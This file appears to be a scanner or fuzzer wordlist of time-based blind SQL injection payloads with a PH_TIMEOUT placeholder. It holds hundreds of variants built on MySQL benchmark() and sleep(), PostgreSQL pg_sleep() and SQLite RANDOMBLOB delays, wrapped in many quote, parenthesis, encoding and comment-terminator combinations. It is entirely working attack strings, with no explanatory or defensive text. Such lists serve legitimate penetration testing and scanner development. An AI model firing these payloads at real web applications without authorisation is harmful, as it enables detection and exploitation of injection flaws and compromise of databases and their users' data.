and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
 and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
 and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
' and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
' and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
' and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
" and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
" and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
" and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
)) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
)) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
)) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
)))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
)))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
)))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
') and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
') and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
') and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
") and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
") and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
") and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
')) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
')) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
')) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
")) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
")) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
")) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
'))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
'))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
'))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
"))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
"))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
"))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
')))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
')))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
')))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
")))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20/*
")))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20--
")))) and 0=benchmark(PH_TIMEOUT000000,MD5(1))%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20/* 
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20/* 
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20/* 
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(PH_TIMEOUT000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
,(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(PH_TIMEOUT000000,MD5(1)),benchmark(PH_TIMEOUT000000,MD5(1))))%23
sleep(PH_TIMEOUT)#
1 or sleep(PH_TIMEOUT)#
" or sleep(PH_TIMEOUT)#
' or sleep(PH_TIMEOUT)#
" or sleep(PH_TIMEOUT)="
' or sleep(PH_TIMEOUT)='
1) or sleep(PH_TIMEOUT)#
") or sleep(PH_TIMEOUT)="
') or sleep(PH_TIMEOUT)='
1)) or sleep(PH_TIMEOUT)#
")) or sleep(PH_TIMEOUT)="
')) or sleep(PH_TIMEOUT)='
benchmark(PH_TIMEOUT000000,MD5(1))#
1 or benchmark(PH_TIMEOUT000000,MD5(1))#
" or benchmark(PH_TIMEOUT000000,MD5(1))#
' or benchmark(PH_TIMEOUT000000,MD5(1))#
1) or benchmark(PH_TIMEOUT000000,MD5(1))#
") or benchmark(PH_TIMEOUT000000,MD5(1))#
') or benchmark(PH_TIMEOUT000000,MD5(1))#
1)) or benchmark(PH_TIMEOUT000000,MD5(1))#
")) or benchmark(PH_TIMEOUT000000,MD5(1))#
')) or benchmark(PH_TIMEOUT000000,MD5(1))#
pg_sleep(PH_TIMEOUT)--
1 or pg_sleep(PH_TIMEOUT)--
" or pg_sleep(PH_TIMEOUT)--
' or pg_sleep(PH_TIMEOUT)--
1) or pg_sleep(PH_TIMEOUT)--
") or pg_sleep(PH_TIMEOUT)--
') or pg_sleep(PH_TIMEOUT)--
1)) or pg_sleep(PH_TIMEOUT)--
")) or pg_sleep(PH_TIMEOUT)--
')) or pg_sleep(PH_TIMEOUT)--
AND (SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))nQIP)
AND (SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))nQIP)--
AND (SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))nQIP)#
sleep(PH_TIMEOUT)#
sleep(PH_TIMEOUT)--
sleep(PH_TIMEOUT)="
sleep(PH_TIMEOUT)='
or sleep(PH_TIMEOUT)
or sleep(PH_TIMEOUT)#
or sleep(PH_TIMEOUT)--
or sleep(PH_TIMEOUT)="
or sleep(PH_TIMEOUT)='
benchmark(PH_TIMEOUT000000,MD5(1))
benchmark(PH_TIMEOUT000000,MD5(1))--
benchmark(PH_TIMEOUT000000,MD5(1))#
or benchmark(PH_TIMEOUT000000,MD5(1))
or benchmark(PH_TIMEOUT000000,MD5(1))--
or benchmark(PH_TIMEOUT000000,MD5(1))#
pg_sleep(PH_TIMEOUT)
pg_sleep(PH_TIMEOUT)--
pg_sleep(PH_TIMEOUT)#
or pg_sleep(PH_TIMEOUT)
or pg_sleep(PH_TIMEOUT)--
or pg_sleep(PH_TIMEOUT)#
AnD sleep(PH_TIMEOUT)
AnD sleep(PH_TIMEOUT)--
AnD sleep(PH_TIMEOUT)#
&&sleep(PH_TIMEOUT)
&&sleep(PH_TIMEOUT)--
&&sleep(PH_TIMEOUT)#
' AnD sleep(PH_TIMEOUT) ANd '1
'&&sleep(PH_TIMEOUT)&&'1
ORDER BY sleep(PH_TIMEOUT)
ORDER BY sleep(PH_TIMEOUT)--
ORDER BY sleep(PH_TIMEOUT)#
(SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))ecMj)
(SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))ecMj)#
(SELECT * FROM (SELECT(sleep(PH_TIMEOUT)))ecMj)--
+benchmark(PH_TIMEOUT000000,SHA1(1))+'
+ SLEEP(PH_TIMEOUT) + '
RANDOMBLOB(PH_TIMEOUT0000000/1)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(PH_TIMEOUT0000000/1))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(PH_TIMEOUT0000000/1))))
RANDOMBLOB(PH_TIMEOUT00000000/1)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(PH_TIMEOUT0000000/1))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(PH_TIMEOUT0000000/1))))
SLEEP(PH_TIMEOUT)/*' or SLEEP(PH_TIMEOUT) or '" or SLEEP(PH_TIMEOUT) or "*/
%27and%20sleep(PH_TIMEOUT)%20--%20-
%20and%20sleep(PH_TIMEOUT)%20--%20-
%27)%20and%20sleep(PH_TIMEOUT)%20--%20-
")%20and%20sleep(PH_TIMEOUT)%20--%20-
"%20and%20sleep(PH_TIMEOUT)%20--%20-
%27))%20and%20sleep(PH_TIMEOUT)%20--%20-
' and sleep(PH_TIMEOUT) -- -
 and sleep(PH_TIMEOUT) -- -
') and sleep(PH_TIMEOUT) -- -
") and sleep(PH_TIMEOUT) -- -
" and sleep(PH_TIMEOUT) -- -
')) and sleep(PH_TIMEOUT) -- -
